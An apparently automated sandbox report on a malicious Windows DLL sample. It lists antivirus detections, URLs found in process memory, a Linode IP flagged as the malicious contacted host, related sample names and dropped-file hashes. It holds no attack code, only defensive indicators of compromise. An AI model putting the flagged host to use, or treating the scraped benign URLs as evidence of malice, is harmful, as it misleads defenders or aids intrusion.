                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      yj81rxDZIp.dll35%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      2.2.regsvr32.exe.1fd0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.26800000000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.198952a0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.regsvr32.exe.12f0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://www.bingmapsportal.comx0%Avira URL Cloudsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.326356261.00000178ADE56000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.326254922.00000178ADE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326959683.00000178ADE69000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000003.326284638.00000178ADE47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326835488.00000178ADE4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.326356261.00000178ADE56000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.ver)svchost.exe, 00000010.00000002.611006767.000001C89A263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.583772838.000002B2430EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.326875966.00000178ADE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001F.00000003.558126192.000002B2439D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558143997.000002B243999000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558158566.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558179115.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558105558.000002B2439D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.326665159.00000178ADE13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000002.326816626.00000178ADE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326361500.00000178ADE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://%s.xboxlive.comsvchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.hotspotshield.com/svchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000002.326816626.00000178ADE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326361500.00000178ADE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://dynamic.tsvchost.exe, 0000000A.00000002.326835488.00000178ADE4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.hotspotshield.com/terms/svchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.pango.co/privacysvchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://disneyplus.com/legal.svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326761792.00000178ADE3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.bingmapsportal.comxsvchost.exe, 0000000A.00000002.326665159.00000178ADE13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.326875966.00000178ADE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://activity.windows.comsvchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://help.disneyplus.com.svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                low
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  23.239.0.12
                                                                                  unknownUnited States
                                                                                  63949LINODE-APLinodeLLCUStrue
                                                                                  IP
                                                                                  192.168.2.1
                                                                                  127.0.0.1
                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:626482
                                                                                  Start date and time: 14/05/202204:44:162022-05-14 04:44:16 +02:00
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 8s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Sample file name:yj81rxDZIp.dll
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Run name:Run with higher sleep bypass
                                                                                  Number of analysed new started processes analysed:36
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal84.troj.evad.winDLL@28/6@0/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 38
                                                                                  • Number of non-executed functions: 189
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .dll
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, UsoClient.exe, wuapihost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.49.150.241, 51.104.136.2, 20.223.24.244
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, settings-prod-uks-2.uksouth.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  TimeTypeDescription
                                                                                  04:49:20API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                  04:50:13API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  23.239.0.123j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                      r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                        TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                            Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                      36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                        Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                          cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                            56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                              8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                    wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                      yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                        bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          No context
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          LINODE-APLinodeLLCUS3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          51c64c77e60f3980eea90869b68c58a83j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          lc4KFeS296.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          36yjawe0S4.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          Ns2al4764F.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                                                                          • 23.239.0.12
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8192
                                                                                                                          Entropy (8bit):0.3593198815979092
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                          MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                          SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                          SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                          SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                          Malicious:false
                                                                                                                          Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:MPEG-4 LOAS
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.24946989358219657
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU42:BJiRdwfu2SRU42
                                                                                                                          MD5:2FBE14C74D06BE1AA51A635CF0257EED
                                                                                                                          SHA1:19D793A74620BA5856D2C1646BBB70BA906CB3CB
                                                                                                                          SHA-256:855940FFBE728984A4693D15683D024AA0B7DB09831AA683462466AAA323DBD7
                                                                                                                          SHA-512:B50693F93AEB45E8BF1BD25686DAA70672009F9AB3040572F226439BC41BFA17738564345A5DFC31B4F3ABFE8FFACF17157C82BC4A4607E13AA52567A5153299
                                                                                                                          Malicious:false
                                                                                                                          Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe9bd06a2, page size 16384, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):786432
                                                                                                                          Entropy (8bit):0.25070496398974956
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:lLq+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:lLFSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                          MD5:AA7A8F2219E3359C36921462F24249B4
                                                                                                                          SHA1:7F267B1185D109F042C3842CC3290630FD690F47
                                                                                                                          SHA-256:E3A04A1AFCD45B04BF844BD145CBF4415E12407EA2129C8AD858E734F5C0E1BB
                                                                                                                          SHA-512:A84595EBBF12C151DD140C6037B93DE53A1BF8A263116D05A72849AD8325D147EF03341CEA69CF0163933A422E9D18E30B4718FF229D53CDA06A22CC01F3CA24
                                                                                                                          Malicious:false
                                                                                                                          Preview:...... ................e.f.3...w........................)......3...z...1...z..h.(......3...z....)..............3...w...........................................................................................................B...........@...................................................................................................... .....................................................................................................................................................................................................................................................^..3...z..................S...3...z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.07608694755610981
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:GSlr7vwUpf66Wk/ru0ucmu8XWJJ6r/all3Vkttlmlnl:GSlrrwUx66AcmaH6C3
                                                                                                                          MD5:61CE791B2759532F50401F9BF54A5282
                                                                                                                          SHA1:4C5FB35F6B203183A5388F9A60F269FDCE1CDE36
                                                                                                                          SHA-256:C72142F4F508DE5FD945B6830920353572839A1F4CE2B00D60B3DC20A241B415
                                                                                                                          SHA-512:F3D2B5E7FD21E9DC68B8E567755E3BDA7C138B027350FBA8555B73B3E78366A9E639AB96415333880B4F215EFA36BD904A3D6AAF6ED923D36782735D87D96926
                                                                                                                          Malicious:false
                                                                                                                          Preview:..l_.....................................3...w...1...z;..3...z...........3...z...3...z..a;...3...z-q................S...3...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):9062
                                                                                                                          Entropy (8bit):3.1636411415638506
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zN+C:j+s+v+b+P+m+0+Q+q+W+C
                                                                                                                          MD5:7D12D88C3EBCFD40448E4DED93485EBC
                                                                                                                          SHA1:7A4916D26A21E74E267E9B090EC56136B2257B4D
                                                                                                                          SHA-256:E846308198258D42BA29304C7CCAA7FDF468EE49FB7A95159825A189DC0DF594
                                                                                                                          SHA-512:E737B6B8185FCA689771CA9FC08557EE34FFA382F9EA62B358E12ADB6CDEB83ECAF42647FA441D368EAED834005F7B55DA2D758D24D01DFECE713E66D93076B3
                                                                                                                          Malicious:false
